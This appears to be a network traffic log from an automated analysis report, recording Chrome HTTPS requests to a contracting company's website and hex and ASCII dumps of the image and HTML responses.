                                              2024-09-27 06:20:23 UTC8000INData Raw: 63 d7 48 2c 1d 75 00 9a 17 91 54 db b1 56 d8 98 1e 73 75 13 28 43 28 ad e7 20 99 16 ba cc 29 45 9c eb 84 26 5c 96 27 7e ee 61 7d 02 07 e2 ae ba 05 6a 6e 69 0f 6a 5d 15 ee 66 f4 7c ed 12 4d 92 a8 9a f3 a5 fd 33 23 63 2c 3b d9 c7 dd 96 4f 71 a8 26 6b 11 72 cb af a9 e9 78 b1 89 1b bb 73 56 9b 1d 72 d3 2b 6a a3 38 da dd 35 bc c1 2a 51 89 85 ff fd 68 a6 6d 0d 56 9a 2a c3 ca b9 46 95 fa f9 66 b5 1c 70 ef 25 a3 bc e8 02 2c 89 c3 01 58 ce 42 cd e9 7f 6e 80 32 26 e1 09 71 80 6f 24 55 ad 45 b1 3a d3 b7 dd 68 0e 26 8f a7 cd 60 69 51 88 57 5d bf eb 00 4b 9e 31 54 ea ab 1e 81 96 7d 95 e8 0b 95 ea 4e aa 86 bc 5a 5b 7f ff 74 17 9d a7 6c 5f aa 4f 67 e0 aa e0 c1 9e 65 6b f6 62 14 fd db 2a 20 5d 93 17 06 83 52 81 64 9f b9 2b 8a 47 6a b3 06 55 eb 13 b3 43 37 5c c2 5c fa b2
                                              Data Ascii: cH,uTVsu(C( )E&\'~a}jnij]f|M3#c,;Oq&krxsVr+j85*QhmV*Ffp%,XBn2&qo$UE:h&`iQW]K1T}NZ[tl_Ogekb* ]Rd+GjUC7\\
                                              2024-09-27 06:20:23 UTC5953INData Raw: 57 27 b6 aa 7f fc f7 c1 db 73 5b 67 d0 f8 a0 ca ae cb 2b 3c 70 07 45 7e 2d 2f 4c 2a bf 8d b3 fd be 09 e3 ba ff 51 46 f7 7c c1 1d b8 ae e4 d5 e0 4c 72 b9 78 b6 ea a7 e8 fd 23 6c cd eb cb 6d b1 62 66 62 57 9d 96 88 4f d7 7e b4 c8 30 c1 2a e7 f1 67 23 5e 93 e9 ed 8c 45 55 5b a1 1b 7d ed 77 3d e1 a7 6a 27 56 4d 3b 3c 28 3c 55 53 9d 38 6c 4b 4a 9a 95 2c a7 81 c7 0b 7b ac ce a8 ef 8f ba 5f 41 80 75 07 54 5f fa 01 80 da 40 9e 3d 0f 68 2d b0 1a c2 bb a7 75 8d 7e f0 ed 9b 9d 4d 43 20 25 ae a5 02 1a 3c 44 43 78 77 30 c8 83 6b f2 3e 32 58 64 cf 45 bf eb f6 ee e9 65 d1 b1 c1 d1 e4 37 be 90 ba 0b 2b c6 9f af 84 c8 81 e6 c0 95 5d 17 ef ba 70 85 7a a1 40 fb 0b a6 ea 34 3f 18 f2 66 64 4b 1d b6 38 12 16 ff 74 3a 19 d4 83 83 78 a9 ae f6 04 b3 44 46 77 c8 ec c5 b0 ec c1 e6
                                              Data Ascii: W's[g+<pE~-/L*QF|Lrx#lmbfbWO~0*g#^EU[}w=j'VM;<(<US8lKJ,{_AuT_@=h-u~MC %<DCxw0k>2XdEe7+]pz@4?fdK8t:xDFw


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              137192.168.2.465473173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:23 UTC465OUTGET /uploads/projects/26/a417b2689f08829d773cb2abc660a2f4.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:23 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:23 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 11:55:50 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 32160
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:23 UTC7931INData Raw: 52 49 46 46 98 7d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 24 7d 00 00 10 83 03 9d 01 2a cf 04 a3 03 3e e9 72 b3 54 29 2c 2a b1 22 92 09 5a 20 1d 09 67 4b 96 c9 fe f7 9a 02 aa df b9 e3 eb d3 b4 ef 7f 62 e0 c9 a8 fd 77 12 3d 37 bf 53 3c a6 eb 28 df 73 a4 0f 3a 94 5a 65 b3 88 c7 c7 70 c5 2f 9d 35 6c 87 b0 b7 24 f1 2d d4 b7 46 ae f4 cf 1f bf 6c de fa 3e fd 39 be 9b fb 5f a2 bf 38 9f 3e fd e0 0a 86 ff 9d 7f f0 f3 f3 f5 5f f5 bf fb 78 ff f9 e7 e8 7e ec bd d5 f0 d7 f6 fd df bb 72 76 a3 fb e7 84 5f 91 74 3f ba 2d 40 fd e8 f3 dd fb 73 f7 3d 35 f8 89 fd 97 a2 67 ff af 42 ff b4 7f ea f5 75 ff 9a 25 f4 0f 68 e3 c2 fb 67 9c 26 50 da b5 59 b1 19 40 bc 2b ef 4f 79 a4 85 e2 50 97 38 b0 a2 aa 3c ba 27 34 6d c3 20 63 8b 86 0b b1
                                              Data Ascii: RIFF}WEBPVP8XVP8 $}*>rT),*"Z gKbw=7S<(s:Zep/5l$-Fl>9_8>_x~rv_t?-@s=5gBu%hg&PY@+OyP8<'4m c
                                              2024-09-27 06:20:23 UTC8000INData Raw: 01 2b 6e 14 22 f4 66 03 38 d1 a0 40 18 9a a3 1b f7 a0 71 eb e0 d3 98 05 46 19 39 8b 4f f3 06 2d 49 f8 60 fb a5 ae 0c e2 01 4a f8 79 c8 ab c3 e5 bf 44 f1 b9 db fb a0 f3 e5 1b f3 0d c4 45 95 e0 71 43 0a 3b 15 7f d1 dc e9 a6 4e 8f e1 22 0b 72 a6 6b 19 2d 74 72 f2 6a 1a 40 ea fa 76 d8 6f 20 76 6b ad f7 56 63 06 7e 6d d7 7b d8 c9 cd d3 44 0d f4 f0 78 42 16 47 c1 1c 2f 85 bc 1a 13 07 8e ee 6c 49 06 75 68 fe e0 9a 8b cf 71 77 e1 6a 67 5b cb a1 9b 46 49 8b 45 f0 23 d0 cb 4c 2d ab 67 83 1a 1b 40 aa a4 fb 23 32 19 70 01 f8 7c 3e df 85 d4 ab 7e 4f a8 e7 66 8d 73 44 77 40 4b b6 b5 f0 89 3c fc 2a ba 05 a7 68 dd da 0d 53 c9 12 1f 55 cb 8e f7 c9 02 8e 2f ed 64 8d 64 a0 53 02 25 32 1f ed 22 9c 9e bd 38 7b 90 c0 c8 5f 48 f2 1c 7c bd ac 50 8f 41 c7 ce 1d 0b 6f 70 f9 b8 6c
                                              Data Ascii: +n"f8@qF9O-I`JyDEqC;N"rk-trj@vo vkVc~m{DxBG/lIuhqwjg[FIE#L-g@#2p|>~OfsDw@K<*hSU/ddS%2"8{_H|PAopl
                                              2024-09-27 06:20:23 UTC8000INData Raw: 54 75 df 05 4b 6b 9c 6a 0f 39 2c 71 04 91 52 eb 41 db 34 58 70 ac a2 c2 dd 78 07 4d a0 05 51 48 b7 bd c2 c0 f3 0b b2 ad ad 51 e9 26 7e e2 1a f4 b0 71 d1 71 6e 07 a5 d0 ac 12 9e cc 4f 0c 86 d0 b7 56 44 6c 98 27 01 d9 6a 3a d3 a4 50 d8 c9 cf e7 62 87 07 cb 08 ec 58 1f f6 8a b5 e3 e5 04 97 7c 74 91 71 cc 30 bc 66 bc 30 9d 55 b6 2f 27 e4 48 09 a1 94 a0 96 31 c8 5b ce 16 1c d8 65 ae e0 0a ba e3 c5 d0 92 b9 cd f3 70 2a b2 62 3e 28 58 f3 a5 9a 56 79 fe 5f 59 9a 0e 16 81 b4 74 83 c0 93 8d 5e 17 bf a9 36 00 51 27 7d 6b ff 61 11 69 54 21 d2 0b 64 47 04 ca 69 94 14 91 27 11 28 69 a3 26 cc cf f4 73 dd a1 36 ea e4 aa ea 1c e9 7f 2c e6 83 d0 4e 77 3b d4 1f 6f 98 49 ec b8 0a 7e 9e 52 dd 45 64 d2 97 90 c7 4b 3e 9a 17 99 4b 8e 5f 79 c5 0a fc 70 2c 7e 49 e9 03 8b 9e 74 b3
                                              Data Ascii: TuKkj9,qRA4XpxMQHQ&~qqnOVDl'j:PbX|tq0f0U/'H1[ep*b>(XVy_Yt^6Q'}kaiT!dGi'(i&s6,Nw;oI~REdK>K_yp,~It
                                              2024-09-27 06:20:23 UTC8000INData Raw: 30 61 9f 42 88 12 6a d1 a3 f6 4f 33 8f 6e 9f eb 9d ac 11 e5 c6 ce 7a 08 b5 7d fd 27 7f 81 9b b4 ad e5 f3 b7 7f 6c 50 04 d9 bc ab 0a a5 eb cd 89 a8 80 57 9b d8 0e 79 55 1b 9a f8 a7 ff 81 cd ef 7a 29 e6 9f 67 1c 28 01 d4 45 06 34 23 ca 16 56 4e 89 ed 3b 42 e1 78 fb bd f6 ea 26 60 8f 1b 41 83 11 84 dc 95 ea f4 2e a7 d0 62 6d 26 95 23 53 98 c9 b1 19 fe c8 84 ae 6f de 81 76 86 85 5e b6 d5 68 d6 cb 7d 4d 8e c4 5b c0 dc 87 70 bb 2b 21 7e 98 58 2f 79 a3 9f ef 74 a6 6d 66 b9 99 fc 9f ad 81 f5 5a 03 3e 29 05 4f b6 b1 d2 21 4c 36 80 c4 f2 0c fa 7a c8 ef 9a cb 44 0a 2e 91 4e 1a 29 00 fc dd 78 85 23 02 85 69 ae 9a c0 e5 1f 22 0f 12 1c 88 73 38 1a 2c b6 6a 63 20 40 46 b1 cf 6c ac f5 41 32 b7 2c 6d c7 9a 44 2a 04 af fa b0 10 52 08 fe 3d f0 09 bf 9b 1d ef 6d 7e 4b 5a 94
                                              Data Ascii: 0aBjO3nz}'lPWyUz)g(E4#VN;Bx&`A.bm&#Sov^h}M[p+!~X/ytmfZ>)O!L6zD.N)x#i"s8,jc @FlA2,mD*R=m~KZ
                                              2024-09-27 06:20:23 UTC229INData Raw: 8c 94 e9 f0 47 ac 67 d4 3f 9c b9 cf 7b f0 3f 19 b1 8b cd a8 e1 ec 8a a5 29 86 12 e8 cd 5d 87 7a 4d d5 90 6e 2e 19 db 24 36 9d 4f 83 39 1b 18 03 60 7d 87 4c 81 20 8e 5c 3b e4 38 45 b5 ed 5c 0b 3f db 3f c4 2b 51 a2 46 57 1c 9e b8 27 0f 0b 34 2a 90 3d 92 7c 33 fe 63 27 d2 15 50 af a7 48 a1 c4 d2 21 48 3e 6a 34 84 d4 38 1d 3c 56 71 09 3e 64 09 69 78 ba 50 1c 50 d8 a1 e2 cd b5 85 37 9d f7 04 e9 9a 13 0f 44 45 38 91 91 55 7b 00 00 50 53 41 49 4e 00 00 00 38 42 49 4d 03 ed 00 00 00 00 00 10 00 48 00 00 00 01 00 02 00 48 00 00 00 01 00 02 38 42 49 4d 04 28 00 00 00 00 00 0c 00 00 00 02 3f f0 00 00 00 00 00 00 38 42 49 4d 04 43 00 00 00 00 00 0e 50 62 65 57 01 10 00 06 00 2a 00 00 00 00
                                              Data Ascii: Gg?{?)]zMn.$6O9`}L \;8E\??+QFW'4*=|3c'PH!H>j48<Vq>dixPP7DE8U{PSAIN8BIMHH8BIM(?8BIMCPbeW*


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              138192.168.2.465474173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:23 UTC711OUTGET /news HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:23 UTC389INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:23 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Pragma: no-cache
                                              Access-Control-Allow-Credentials: true
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-09-27 06:20:23 UTC7803INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 21 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 62 61 73 69 63 20 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 69 74 79 20 44 69 61 6d 6f 6e 64 20 43 6f 6e 74 72 61 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76
                                              Data Ascii: 2000<!DOCTYPE HTML><html lang="en"><head> ...=============== basic ===============--> <meta charset="UTF-8"> <title>City Diamond Contracting</title> <meta name="viewport" content="width=dev
                                              2024-09-27 06:20:23 UTC395INData Raw: 32 42 45 59 48 62 75 38 68 77 4b 59 65 79 37 2b 62 79 72 62 38 6c 56 6f 58 39 34 47 4a 35 76 38 7a 52 41 47 41 69 4c 68 30 41 37 43 6b 35 32 73 30 41 76 74 67 54 36 4d 68 44 51 59 75 38 6c 6a 2b 56 38 42 68 4e 66 79 38 6a 2f 33 2f 43 67 41 79 52 41 47 41 69 4c 68 79 50 4c 42 54 51 74 65 35 4b 33 52 6a 67 61 75 41 58 68 37 4c 50 78 6a 34 74 6f 61 66 64 37 30 41 38 42 73 71 33 34 55 67 45 56 4d 41 49 43 49 75 72 41 65 63 6e 38 42 31 4c 73 57 4f 39 67 31 74 58 32 7a 39 67 53 39 58 59 79 63 6d 56 71 73 50 73 49 62 6a 4f 6a 32 4a 6a 76 2f 4e 46 41 55 41 49 6c 4b 72 42 59 44 62 67 59 36 65 72 33 4d 6e 34 55 37 32 4b 7a 55 51 76 30 48 49 52 39 67 6f 52 79 30 32 78 6b 35 65 64 45 6e 44 2f 78 6d 6a 41 45 42 45 61 6c 45 50 33 49 7a 4e 68 2f 76 30 4c 50 42 4c 34 6e
                                              Data Ascii: 2BEYHbu8hwKYey7+byrb8lVoX94GJ5v8zRAGAiLh0A7Ck52s0AvtgT6MhDQYu8lj+V8BhNfy8j/3/CgAyRAGAiLhyPLBTQte5K3RjgauAXh7LPxj4toafd70A8Bsq34UgEVMAICIurAecn8B1LsWO9g1tX2z9gS9XYycmVqsPsIbjOj2Jjv/NFAUAIlKrBYDbgY6er3Mn4U72KzUQv0HIR9goRy02xk5edEnD/xmjAEBEalEP3IzNh/v0LPBL4n
                                              2024-09-27 06:20:23 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:23 UTC8192INData Raw: 32 30 30 30 0d 0a 48 37 47 54 49 54 65 39 71 4f 35 63 6e 7a 7a 39 68 36 42 78 39 2b 77 72 59 32 75 6b 69 79 6f 2b 31 2f 55 68 59 46 41 43 4a 53 71 51 37 41 50 34 45 42 6e 71 39 7a 41 76 42 79 36 4d 59 57 62 49 32 64 78 4f 66 4c 36 63 44 62 6a 73 70 79 50 66 7a 66 67 49 37 2f 7a 53 51 46 41 43 4a 53 71 54 38 41 47 33 71 2b 78 75 33 41 58 30 49 33 74 4b 41 72 66 6f 66 2b 58 77 59 75 63 56 52 57 48 65 34 7a 45 37 35 47 48 46 4d 77 34 70 67 43 41 42 47 70 78 48 62 41 53 5a 36 76 4d 51 5a 4c 67 68 4f 4c 6b 34 47 6c 50 4a 55 39 71 39 44 57 42 6b 66 6c 72 51 72 4d 37 37 69 4f 4f 76 30 76 6f 78 51 41 69 45 69 35 42 67 4d 33 59 6b 2b 5a 76 6b 7a 44 6a 76 59 4e 65 62 70 66 71 61 57 41 33 33 6f 73 2f 33 7a 67 4c 59 66 6c 61 66 75 66 6c 45 30 42 67 49 69 55 36 79 72
                                              Data Ascii: 2000H7GTITe9qO5cnzz9h6Bx9+wrY2ukiyo+1/UhYFACJSqQ7AP4EBnq9zAvBy6MYWbI2dxOfL6cDbjspyPfzfgI7/zSQFACJSqT8AG3q+xu3AX0I3tKArfof+XwYucVRWHe4zE75GHFMw4pgCABGpxHbASZ6vMQZLghOLk4GlPJU9q9DWBkflrQrM77iOOv0voxQAiEi5BgM3Yk+ZvkzDjvYNebpfqaWA33os/3zgLYflafuflE0BgIiU6yr
                                              2024-09-27 06:20:23 UTC6INData Raw: 32 57 50 51 30 37
                                              Data Ascii: 2WPQ07
                                              2024-09-27 06:20:23 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:23 UTC8192INData Raw: 32 30 30 30 0d 0a 39 45 52 67 47 41 69 42 2b 78 72 67 4d 34 6c 62 62 33 74 72 73 65 2f 70 2b 46 4c 58 78 4c 67 77 75 42 68 54 79 56 66 54 59 77 4a 33 51 44 52 55 6f 70 41 42 44 78 49 37 5a 31 41 50 38 46 64 67 62 4f 61 2b 66 37 58 43 38 41 66 42 4f 59 45 62 72 78 5a 64 67 49 4f 4e 68 54 32 57 38 44 64 34 52 75 6f 45 68 7a 48 55 4e 58 51 43 53 6a 51 6f 38 41 66 41 65 38 6a 77 30 39 33 77 48 38 75 38 79 66 63 7a 30 43 6b 49 62 68 2f 36 37 41 31 66 67 37 75 76 6c 73 6f 43 46 30 49 30 57 61 55 77 41 67 34 73 64 59 4c 4e 76 62 67 67 37 4c 2f 41 46 59 47 50 6a 52 55 35 31 37 41 38 73 36 4c 6a 4d 4e 41 63 41 35 77 42 42 50 5a 62 2b 42 44 76 32 52 53 47 6b 4b 51 4d 53 66 70 78 32 58 31 77 76 34 70 63 66 36 72 6f 6e 37 70 2b 44 59 74 77 44 75 43 42 7a 76 73 66 77
                                              Data Ascii: 20009ERgGAiB+xrgM4lbb3trse/p+FLXxLgwuBhTyVfTYwJ3QDRUopABDxI7Z1AP8FdgbOa+f7XC8AfBOYEbrxZdgIONhT2W8Dd4RuoEhzHUNXQCSjQo8AfAe8jw093wH8u8yfcz0CkIbh/67A1fg7uvlsoCF0I0WaUwAg4sdYLNvbgg7L/AFYGPjRU517A8s6LjMNAcA5wBBPZb+BDv2RSGkKQMSfpx2X1wv4pcf6ron7p+DYtwDuCBzvsfw
                                              2024-09-27 06:20:23 UTC6INData Raw: 48 4a 6d 37 43 76
                                              Data Ascii: HJm7Cv
                                              2024-09-27 06:20:23 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:23 UTC8192INData Raw: 32 30 30 30 0d 0a 59 6b 74 6a 64 2b 35 34 71 7a 61 44 49 57 42 4a 78 50 5a 56 73 4a 4f 77 49 6a 69 58 2f 36 71 6a 58 50 59 35 6b 34 4b 33 6b 50 39 4d 4b 47 2b 59 38 6b 6a 6b 51 30 61 54 49 4a 57 34 74 79 44 65 6c 5a 4c 2b 44 54 30 56 67 41 57 6d 34 57 7a 50 48 59 56 4e 56 39 6f 53 75 65 6c 4c 77 46 41 47 41 66 4b 69 64 68 54 78 62 6c 37 67 32 65 67 63 33 48 66 34 37 74 70 53 36 2b 50 69 2f 35 6d 6f 62 6b 48 70 58 71 67 33 58 34 42 32 46 44 59 6c 4b 62 38 63 41 78 32 48 61 2f 63 69 32 4d 4a 58 56 4b 32 31 50 77 4e 39 68 68 4b 6c 39 55 38 44 4f 37 59 57 6d 71 38 35 43 33 77 37 66 2f 59 4b 4d 43 74 32 4b 5a 43 76 4e 71 55 2b 41 4d 59 41 4e 61 44 77 51 61 73 50 55 70 70 2b 49 76 31 30 65 55 38 68 67 41 46 41 33 43 39 72 49 75 56 50 4a 71 59 4f 36 4f 76 66 6a
                                              Data Ascii: 2000Yktjd+54qzaDIWBJxPZVsJOwIjiX/6qjXPY5k4K3kP9MKG+Y8kjkQ0aTIJW4tyDelZL+DT0VgAWm4WzPHYVNV9oSuelLwFAGAfKidhTxbl7g2egc3Hf47tpS6+Pi/5mobkHpXqg3X4B2FDYlKb8cAx2Ha/ci2MJXVK21PwN9hhKl9U8DO7YWmq85C3w7f/YKMCt2KZCvNqU+AMYANaDwQasPUpp+Iv10eU8hgAFA3C9rIuVPJqYO6Ovfj


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              139192.168.2.465475173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:24 UTC715OUTGET /uploads/news/2/d80813aa6c19571f16d2a8796b810d49.jpeg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:24 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:24 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:28:05 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 67181
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:24 UTC7931INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 02 00 01 03 04 05 06 07 08 09 ff da 00 08 01 01 00 00 00 00 f4 20 a5 97 89 4b 3f 53 42 da 0a cd 0e 38 59 a5 c7 48 72 47 2b 88 59 24 63 a9 62 cc f2 c9 6a e4 11 c1 04 71 85 66 95 3b a3
                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm" K?SB8YHrG+Y$cbjqf;
                                              2024-09-27 06:20:24 UTC8000INData Raw: 1c 68 ef f2 b4 f4 39 7d 3a a9 a8 f3 19 4d 23 d7 d6 9e 67 6e f9 72 6d d1 e5 f5 77 6f cd 95 67 93 bf c2 f5 b8 3d 8f 9b f5 a7 6d 79 7d 3e 6e 1e fc 4c bb 73 d3 07 17 67 4a 2b 27 4e bc 43 83 cb f6 fc de 4f 76 9c fd dc 5d 94 6f 11 b6 15 da 27 af 87 3b 65 c5 e8 76 78 f5 f4 72 e8 a5 b2 cd 4c ba 9d ba e5 cb cb e9 67 7b 56 9b 67 4e d8 e7 1c 7e 15 fd ae ed 30 e1 af 87 f4 7d d4 a4 cd 2f d3 c5 3b 76 f9 d6 c2 dc fe 5f b1 b4 cc 46 1a 2f 19 cf 4c 52 62 91 b6 1b 67 9d 2f cd d3 df d1 c3 06 5c bc bb fa bf 3d 4f 4b af c7 8a fa fa 6b 7e 7f 27 cc fa 8e b8 e1 f1 7d ef 5b cf cf 37 4d 2d 38 f9 fd f1 a7 2e bb 65 86 ad 51 1c 79 7a 3b 39 76 d1 e9 79 f4 39 af 6e 6e 1e ee 5f 4a 29 9f 05 7d 9e 1b f4 c6 7b fa f8 79 de 2f b9 dd 86 71 bd 72 e9 e4 d3 24 d7 3b 6f 96 34 d7 5b 29 cd c9 df d1
                                              Data Ascii: h9}:M#gnrmwog=my}>nLsgJ+'NCOv]o';evxrLg{VgN~0}/;v_F/LRbg/\=OKk~'}[7M-8.eQyz;9vy9nn_J)}{y/qr$;o4[)
                                              2024-09-27 06:20:24 UTC8000INData Raw: de 1e 6e f9 aa aa eb d3 af 5a aa 22 a8 a5 68 18 bc 38 11 48 79 58 01 36 84 a1 00 59 3d dc 52 0d e3 c0 60 68 34 38 27 b7 67 08 1e 0e 9d 95 89 c1 88 18 80 d0 0b 2b 2e 27 25 a2 8b 22 2c a4 30 e2 b1 9c 1c 1c f2 b6 46 27 11 8d ca 8c e4 e6 29 21 28 c0 59 42 23 48 84 35 63 51 0a 10 c0 6e ee ef f3 be 07 d9 b5 df 35 55 55 55 55 43 83 87 e9 54 41 07 09 f1 80 b1 c1 0a 50 4a 12 95 d9 5a dd b5 38 14 0e 28 29 2d b8 5d 2e 24 a2 38 8b e0 2d a9 41 e5 2c 92 aa 00 70 c0 b0 a5 3c 8c 5a c2 c2 82 bb be 46 12 df 0a c7 38 6d 0a 20 2d 49 cd 7a f6 ed b9 18 26 d6 b1 89 31 76 08 c0 00 18 30 65 dd f3 59 77 5f b4 64 55 55 55 55 7d 6a 88 a2 2a b8 aa 22 ba f5 20 a4 b6 50 53 4d e2 9d 40 2b 2e 87 56 e2 42 9b 69 57 84 38 9a 65 90 90 42 8b 9e 43 8a 29 24 2d 2d 11 80 27 1a c9 b2 0a d2 03 cc
                                              Data Ascii: nZ"h8HyX6Y=R`h48'g+.'%",0F')!(YB#H5cQn5UUUUCTAPJZ8()-].$8-A,p<ZF8m -Iz&1v0eYw_dUUUU}j*" PSM@+.VBiW8eBC)$--'
                                              2024-09-27 06:20:24 UTC8000INData Raw: 38 73 de 1a 7b 8e 16 37 8b 53 14 6a 56 54 b1 3b 1d a5 2d 42 30 41 c8 08 ee e4 81 7b f3 89 48 ad 36 a5 67 1c cc a7 de 92 57 73 f4 83 de cb fa 69 2b f7 a4 5e c0 6c 25 57 ab 5a b3 3f b8 bb 75 06 0e fd 72 a8 51 6d 86 93 11 49 50 d3 b6 9b 83 ce 1c 46 25 fb cc 89 c3 a7 49 83 6c f5 58 77 95 47 0a fc b0 e2 33 05 39 2f ef 79 88 a1 10 5f 41 cb a0 94 a9 82 b4 d5 82 93 a5 f7 32 8d 3b dd ac 65 37 51 4f bb b8 27 73 16 99 7a 96 cb 9b 50 25 5c 2e 00 3b 77 60 56 37 1f 35 a5 15 a8 ac b7 62 3f 43 17 13 9b 37 0b ca 14 29 83 9b 35 a6 2b 13 8a ef 5a a2 d8 7b ab 15 7b 92 eb a0 dc 5a 63 b1 55 34 c3 d5 22 fa 5c 68 04 ad 87 7b b0 b6 9d 6f 2e e6 03 a1 1b c5 cd 97 2c a6 0f 0a fd 7b 69 d3 aa a1 dc 2f 0d e3 9a a3 ec e6 c8 37 ff 00 54 ab 5a 9d 16 ee ed 7d fd 9c 98 7a 87 ca 5b 59 7b 09
                                              Data Ascii: 8s{7SjVT;-B0A{H6gWsi+^l%WZ?urQmIPF%IlXwG39/y_A2;e7QO'szP%\.;w`V75b?C7)5+Z{{ZcU4"\h{o.,{i/7TZ}z[Y{
